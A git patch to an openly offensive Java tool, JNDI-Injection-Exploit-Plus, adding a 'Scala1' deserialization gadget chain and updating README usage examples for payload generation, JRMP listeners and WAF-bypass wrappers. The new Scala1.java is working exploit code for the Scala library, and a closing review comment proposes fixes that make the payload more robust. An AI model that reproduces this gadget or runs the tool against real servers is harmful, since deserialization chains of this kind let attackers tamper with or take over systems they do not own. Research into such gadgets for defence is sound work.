From f9e097041b08d48289c3dae004996caa28718184 Mon Sep 17 00:00:00 2001 From: cckuailong <346813862@qq.com> Date: Mon, 24 Jun 2024 19:37:47 +0800 Subject: [PATCH] add chain scala1 --- README.md | 21 ++--- README_zh.md | 20 ++--- pom.xml | 8 +- src/main/java/payloads/Scala1.java | 83 +++++++++++++++++++ .../java/payloads/annotation/Authors.java | 1 + src/main/java/util/StubClassConstructor.java | 6 ++ 6 files changed, 118 insertions(+), 21 deletions(-) create mode 100644 src/main/java/payloads/Scala1.java create mode 100644 src/main/java/util/StubClassConstructor.java diff --git a/README.md b/README.md index 9c0ff94..ecbad40 100644 --- a/README.md +++ b/README.md @@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath -#### 3. Deserailization Gadget (total: 74) +#### 3. Deserailization Gadget (total: 75) P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^ @@ -97,6 +97,7 @@ Myfaces1 |@mbechler| Myfaces2 |@mbechler| ROME1 |@mbechler |rome:1.0 ROME2 :arrow_up: |@firebasky |rome:1.0 +Scala1 :arrow_up: |@jarij |org.scala-lang:scala-library:2.13.x Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 Spring3 :arrow_up: |@cckuailong |spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2 @@ -137,7 +138,7 @@ Dirty | Insert a lot of dirty data to bypass WAF - Example ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream ``` ![](./img/4.png) 
@@ -149,7 +150,7 @@ Hide class name to bypass WAF. - Example ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F ``` Reference: [https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html) @@ -157,7 +158,7 @@ Reference: [https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html] #### Web service to return Deserial Gadgets ```shell -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar ``` ```shell @@ -177,7 +178,7 @@ P.S. Param wrapper & output is opetional Run as ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address] ``` where: @@ -207,7 +208,7 @@ Points for attention: Run as ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] ``` where: @@ -225,13 +226,13 @@ where: - JRMPListener ```shell -java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc +java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc ``` - JRMPClient ```shell -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 ``` ## Examples 
@@ -243,7 +244,7 @@ Local demo: 1. Start the tool like this: ```shell - $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" + $ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" ``` Screenshot: @@ -274,7 +275,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail ### Deserialization Payloads ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 ``` Base64 Output Result: diff --git a/README_zh.md b/README_zh.md index cf288f4..a17a2e7 100644 --- a/README_zh.md +++ b/README_zh.md @@ -12,14 +12,14 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目 - 远程Reference链 (3种) - 本地Reference链 (4种) -- 反序列化链(74种) +- 反序列化链(75种) P.S. 具体利用链名称及依赖见 [表格](./README.md) #### 使用方法 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address] ``` #### 参数说明 @@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] 1. 运行工具 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" ``` ![](./img/1.png) 
@@ -64,7 +64,7 @@ class Test{ #### 使用方法 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] ``` #### 参数说明 @@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] 1. 普通 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 ``` ![](./img/3.png) @@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applica - JRMPListener ``` -java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc +java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc ``` - JRMPClient ``` -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 ``` #### 提供反序列化包装器 @@ -114,7 +114,7 @@ Dirty | 插入大量脏数据来绕过WAF检测 - 示例 ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream ``` ![](./img/4.png) 
@@ -126,7 +126,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calcula - Example ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F ``` 参考链接:[https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html) @@ -134,7 +134,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calcula #### 可以返回反序列化数据的web服务 ```shell -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar ``` ```shell diff --git a/pom.xml b/pom.xml index f68c9f4..24eeaad 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ cckuailong JNDI-Injection-Exploit-Plus - 2.4-SNAPSHOT + 2.5-SNAPSHOT UTF-8 @@ -260,6 +260,12 @@ 26.0.1.Final + + org.scala-lang + scala-library + 2.13.6 + + org.springframework spring-tx diff --git a/src/main/java/payloads/Scala1.java b/src/main/java/payloads/Scala1.java new file mode 100644 index 0000000..982ea5a --- /dev/null +++ b/src/main/java/payloads/Scala1.java 
@@ -0,0 +1,83 @@
+package payloads;
+
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import scala.Tuple2;
+import sun.reflect.ReflectionFactory;
+import util.PayloadRunner;
+import util.StubClassConstructor;
+
+import java.io.*;
+import java.lang.invoke.MethodHandleInfo;
+import java.lang.invoke.SerializedLambda;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.util.concurrent.ConcurrentSkipListMap;
+
+
+@SuppressWarnings({"rawtypes"})
+@Dependencies({"org.scala-lang:scala-library:2.13.6"})
+@Authors({ Authors.JARIJ })
+public class Scala1 extends PayloadRunner implements ObjectPayload {
+
+ public Object getObject(final String command) throws Exception {
+ String[] nameValue = command.split(":");
+ String key = nameValue[0];
+ String value = nameValue[1];
+
+ ReflectionFactory rf =
+ ReflectionFactory.getReflectionFactory();
+
+ Tuple2 prop = new scala.Tuple2<>(key, value);
+
+ // Should be: 142951686315914362
+ long versionUID = ObjectStreamClass.lookup(scala.Tuple2.class).getSerialVersionUID();
+// System.out.println("VersionUID: " + versionUID);
+
+ SerializedLambda lambdaSetSystemProperty = new SerializedLambda(scala.sys.SystemProperties.class,
+ "scala/Function0", "apply", "()Ljava/lang/Object;",
+ MethodHandleInfo.REF_invokeStatic, "scala.sys.SystemProperties",
+ "$anonfun$addOne$1", "(Lscala/Tuple2;)Ljava/lang/String;",
+ "()Lscala/sys/SystemProperties;", new Object[]{prop});
+
+ Class clazz = Class.forName("scala.collection.View$Fill");
+ Constructor ctor = clazz.getConstructor(int.class, scala.Function0.class);
+ Object view = ctor.newInstance(1, createFuncFromSerializedLambda(lambdaSetSystemProperty));
+
+ clazz = Class.forName("scala.math.Ordering$IterableOrdering");
+ ctor = rf.newConstructorForSerialization(
+ clazz, StubClassConstructor.class.getDeclaredConstructor()
+ );
+
+ Object iterableOrdering = ctor.newInstance();
+
+ // on readObject, ConcurrentSkipListMap invokes comparator.compare(Object x, Object y);
+ // Initialize ConcurrentSkipList with a dummy comparator (a comparator that allows putting values into the list)
+ ConcurrentSkipListMap map = new ConcurrentSkipListMap((o1, o2) -> 1);
+
+ // add the view entry to the map, when the view.iterable().next() is invoked, the System.setProperty lambda is executed
+ map.put(view, 1);
+ map.put(view, 2);
+
+ // Replace the comparator with the IterableComparator
+ // IterableComparator is responsible for executing the view.iterable().next() on comparison
+ Field f = map.getClass().getDeclaredField("comparator");
+ f.setAccessible(true);
+ f.set(map, iterableOrdering);
+
+ return map;
+ }
+
+ private static Object createFuncFromSerializedLambda(SerializedLambda serialized) throws IOException, ClassNotFoundException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(serialized);
+
+ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
+ return ois.readObject();
+ }
+
+ public static byte[] getBytes (final String command, Boolean fusion) throws Exception {
+ return PayloadRunner.run(Scala1.class, command,fusion);
+ }
+}
diff --git a/src/main/java/payloads/annotation/Authors.java b/src/main/java/payloads/annotation/Authors.java
index 14e207a..9813e8b 100644
--- a/src/main/java/payloads/annotation/Authors.java
+++ b/src/main/java/payloads/annotation/Authors.java
@@ -30,6 +30,7 @@
 String CCKUAILONG = "cckuailong";
 String YULEGEYU = "yulegeyu";
 String Y4ER = "y4er";
+ String JARIJ = "jarij";
 String[] value() default {};
diff --git a/src/main/java/util/StubClassConstructor.java b/src/main/java/util/StubClassConstructor.java
new file mode 100644
index 0000000..086da33
--- /dev/null
+++ b/src/main/java/util/StubClassConstructor.java
@@ -0,0 +1,6 @@
+package util;
+
+public class StubClassConstructor {
+ public StubClassConstructor() {
+ }
+}
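Review bot: `getObject` reads `nameValue[1]` without checking that `command.split(":")` produced two parts, so a `-C` argument with no colon fails with an ArrayIndexOutOfBoundsException instead of a usable message, and a value that itself contains a colon is silently truncated at the first one. Replace the split with `String[] nameValue = command.split(":", 2);` and follow it with `if (nameValue.length != 2) throw new IllegalArgumentException("Scala1 expects key:value, got: " + command);`. The `versionUID` local is computed but never read now that its println is commented out, so the lookup and the commented-out line should go, keeping at most the `// Should be: ...` remark. Because this gadget takes a `key:value` pair that ends up in a System.setProperty call (per the comment above `map.put`) rather than a command like the README examples pass to `-C`, the class deserves a Javadoc sentence saying so and the README row added in the first hunk should state it too; that row's `2.13.x` should also agree with the `2.13.6` declared in `@Dependencies`. The two object streams in `createFuncFromSerializedLambda` are never closed and would be cleaner under try-with-resources.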